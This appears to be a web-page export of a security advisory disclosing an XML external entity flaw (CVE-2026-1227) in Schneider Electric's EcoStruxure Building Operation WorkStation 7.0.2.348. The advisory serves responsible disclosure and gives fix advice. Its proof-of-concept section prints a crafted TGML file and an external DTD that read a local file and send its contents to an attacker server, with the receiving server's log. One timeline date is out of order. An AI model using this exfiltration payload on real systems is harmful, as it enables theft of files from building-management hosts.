{"id":25309,"date":"2026-07-14T08:00:45","date_gmt":"2026-07-14T06:00:45","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=25309"},"modified":"2026-07-14T08:03:02","modified_gmt":"2026-07-14T06:03:02","slug":"usd-2025-45","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-45\/","title":{"rendered":"usd-2025-45"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.27.7\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.7\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n<h1>usd-2025-45 | EcoStruxure Building Operation - WorkStation 7.0.2.348 - XML External Entity Injection<\/h1>\n<h1><\/h1>\n<p><strong>Product<\/strong>: EcoStruxure Building Operation - WorkStation<br \/><strong>Affected Version<\/strong>: 7.0.2.348<br \/><strong>Vulnerability Type<\/strong>: Improper Restriction of XML External Entity Reference (CWE-611)<br \/><strong>Security Risk<\/strong>: CRITICAL<br \/><strong>Vendor<\/strong>: Schneider Electric<br \/><strong>Vendor URL<\/strong>: <a href=\"https:\/\/ecostruxure-building-help.se.com\/bms\/topics\/show.castle?id=8064&amp;locale=en-US&amp;productversion=7.0\" target=\"_blank\" rel=\"noopener\">https:\/\/ecostruxure-building-help.se.com\/bms\/topics\/show.castle?id=8064&amp;locale=en-US&amp;productversion=7.0<\/a><br \/><strong>Vendor acknowledged vulnerability<\/strong>: Yes<br \/><strong>Vendor Status<\/strong>: Fixed<br \/><strong>CVE Number<\/strong>: <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-1227\" target=\"_blank\" rel=\"noopener\">CVE-2026-1227<\/a><br \/><strong>CVE Link<\/strong>: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-1227<br \/><strong>Advisory ID<\/strong>: usd-2025-45<\/p>\n<h3>Description<\/h3>\n<p>The interface allows processing of external XML entities.<br \/>Due to this, the tgml-viewer accepts malicious Graphics in <strong>TGML<\/strong> format with external entities enabled, allowing attackers to reference local files or remote resources.<\/p>\n<p>The inclusion of local files exposes the highest potential risk.<br \/>Sensitive data, e.g. password hashes, residing on the server can possibly be accessed by an adversary.<br \/>Additionally, an attacker may be able to circumvent network segmentation mechanisms or firewalls when using URLs in the entity, because requests are sent by the targeted server and not by the attacker's host.<br \/>One possible goal here might be to perform a scan of the internal network.<br \/>This can be achieved by examining the results of the manipulated queries.<br \/>Furthermore, the targeted system can be abused to launch denial of service attacks (DoS) on third party systems by injecting a large number of external references into the request.<\/p>\n<h3>Proof of Concept<\/h3>\n<p>In the following excerpt, a crafted <strong>TGML<\/strong> document is shown, which contains external entities:<\/p>\n<pre class=\"codehilite\" style=\"line-height: 125%;background: #263238;color: #eff\">&lt;?xml version=\"1.0\"?&gt;<br \/>&lt;!DOCTYPE tgml [<br \/>  &lt;!-- External entity - to test server --&gt;<br \/>  &lt;!ENTITY % externalHttp SYSTEM \"[http:\/\/154.5.45.18:8081\/scanner.dtd\"&gt;]()<br \/>  %externalHttp;]&gt;<br \/>&lt;?tgml version=\"2.0\"?&gt;<br \/>&lt;Tgml Background=\"#E0E0E0\" ComponentCounter=\"4\" GridSize=\"10\"&gt;<br \/>  &lt;!-- External HTTP entity --&gt;<br \/>  &lt;Text FontFamily=\"Arial\" FontSize=\"20\" FontStyle=\"Normal\"<br \/>        FontWeight=\"Normal\" HorizontalAlign=\"Left\" Left=\"0.0\"<br \/>        Opacity=\"1.0\" TextDecoration=\"None\" Top=\"10.0\"<br \/>        VerticalAlign=\"Top\"&gt;<br \/>    External DTD Test<br \/>  &lt;\/Text&gt;<br \/>&lt;\/Tgml&gt;<\/pre>\n<p>On the attacker server, the following <strong>scanner.dtd<\/strong> file was hosted on port 8081:<\/p>\n<pre class=\"codehilite\" style=\"line-height: 125%;background: #263238;color: #eff\">&lt;!ENTITY % f SYSTEM \"file:\/\/\/C:\/Users\/Public\/secret.txt\"&gt;<br \/>&lt;!ENTITY % eval \"&lt;!ENTITY &amp;#x25; show SYSTEM '[http:\/\/154.5.45.18:1337\/%f;'&gt;\"&gt;]()<br \/>%eval;<br \/>%show;<\/pre>\n<p>To prove this vulnerabilty, the following PoC file was created on the host that runs WorkStation:<\/p>\n<pre class=\"codehilite\" style=\"line-height: 125%;background: #263238;color: #eff\">PS C:\\\\&gt; cat C:\/Users\/Public\/secret.txt<br \/>V3ry-S3cret<\/pre>\n<p>A malicious Graphic is now created in WorkStation using the crafted <strong>TGML<\/strong> document shown above:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/new_object.png\" width=\"1353\" height=\"718\" alt=\"\" class=\"wp-image-25183 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/new_object.png 1353w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/new_object-1280x679.png 1280w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/new_object-980x520.png 980w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/new_object-480x255.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) and (max-width: 1280px) 1280px, (min-width: 1281px) 1353px, 100vw\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/select_object_type.png\" width=\"918\" height=\"506\" alt=\"\" class=\"wp-image-25181 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/select_object_type.png 918w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/select_object_type-480x265.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 918px, 100vw\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/choose_crafted_tgml.png\" width=\"786\" height=\"432\" alt=\"\" class=\"wp-image-25187 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/choose_crafted_tgml.png 786w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/choose_crafted_tgml-480x264.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 786px, 100vw\" \/><\/p>\n<p>When inspecting the newly created Graphic in WorkStation, it shows an error message as shown below:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/error_message_when_opening.png\" width=\"1063\" height=\"554\" alt=\"\" class=\"wp-image-25185 alignnone size-full\" srcset=\"https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/error_message_when_opening.png 1063w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/error_message_when_opening-980x511.png 980w, https:\/\/herolab.usd.de\/wp-content\/uploads\/sites\/9\/2026\/06\/error_message_when_opening-480x250.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1063px, 100vw\" \/><\/p>\n<p>However, there was a callback on port 1337 of the attacker server containing the content of the previously created PoC file in the called endpoint:<\/p>\n<pre class=\"codehilite\" style=\"line-height: 125%;background: #263238;color: #eff\">$ python3 -m http.server 1337<br \/>Serving HTTP on 0.0.0.0 port 1337 (http:\/\/0.0.0.0:1337\/) ...<br \/>154.5.45.17 - - [04\/Sep\/2025 13:40:14] code 404, message File not found<br \/>154.5.45.17 - - [04\/Sep\/2025 13:40:14] \"GET \/V3ry-S3cret HTTP\/1.1\" 404 -<\/pre>\n<h3>Fix<\/h3>\n<p>It is recommended to disable the processing of external entities, if this feature is not explicitly required.<br \/>As an alternative, requests to external entities may be restricted, e.g. by using a list of allowed resources or hosts.<\/p>\n<h3>References<\/h3>\n<p>A official advisory by Schneider Electric can be found here: <a href=\"https:\/\/download.schneider-electric.com\/files?p_Doc_Ref=SEVD-2026-041-02&amp;p_enDocType=Security+and+Safety+Notice&amp;p_File_Name=SEVD-2026-041-02.pdf\" target=\"_blank\" rel=\"noopener\">https:\/\/download.schneider-electric.com\/files?p_Doc_Ref=SEVD-2026-041-02&amp;p_enDocType=Security+and+Safety+Notice&amp;p_File_Name=SEVD-2026-041-02.pdf<\/a><\/p>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2025-09-12<\/strong>: Vulnerabilities reported to Schneider Electric<\/li>\n<li><strong>2026-09-19<\/strong>: Schneider Electric assign the internal IDs SE-20492, SE-20493 and SE-20494<\/li>\n<li><strong>2026-01-02<\/strong>: After multiple follow-ups, the vendor reports that the investigation of the report is finished and that a fix will be released in early Q1 2026<\/li>\n<li><strong>2026-07-14<\/strong>: This advisory is published.<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p>This security vulnerability was identified by Robin Plugge of usd AG.<\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2025-45 | EcoStruxure Building Operation - WorkStation 7.0.2.348 - XML External Entity Injection Product: EcoStruxure Building Operation - WorkStationAffected Version: 7.0.2.348Vulnerability Type: Improper Restriction of XML External Entity Reference (CWE-611)Security Risk: CRITICALVendor: Schneider ElectricVendor URL: https:\/\/ecostruxure-building-help.se.com\/bms\/topics\/show.castle?id=8064&amp;locale=en-US&amp;productversion=7.0Vendor acknowledged vulnerability: YesVendor Status: FixedCVE Number: CVE-2026-1227CVE Link: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-1227Advisory ID: usd-2025-45 Description The interface allows processing of external XML [&hellip;]<\/p>\n","protected":false},"author":114,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-25309","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/25309","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/114"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=25309"}],"version-history":[{"count":4,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/25309\/revisions"}],"predecessor-version":[{"id":25316,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/25309\/revisions\/25316"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=25309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}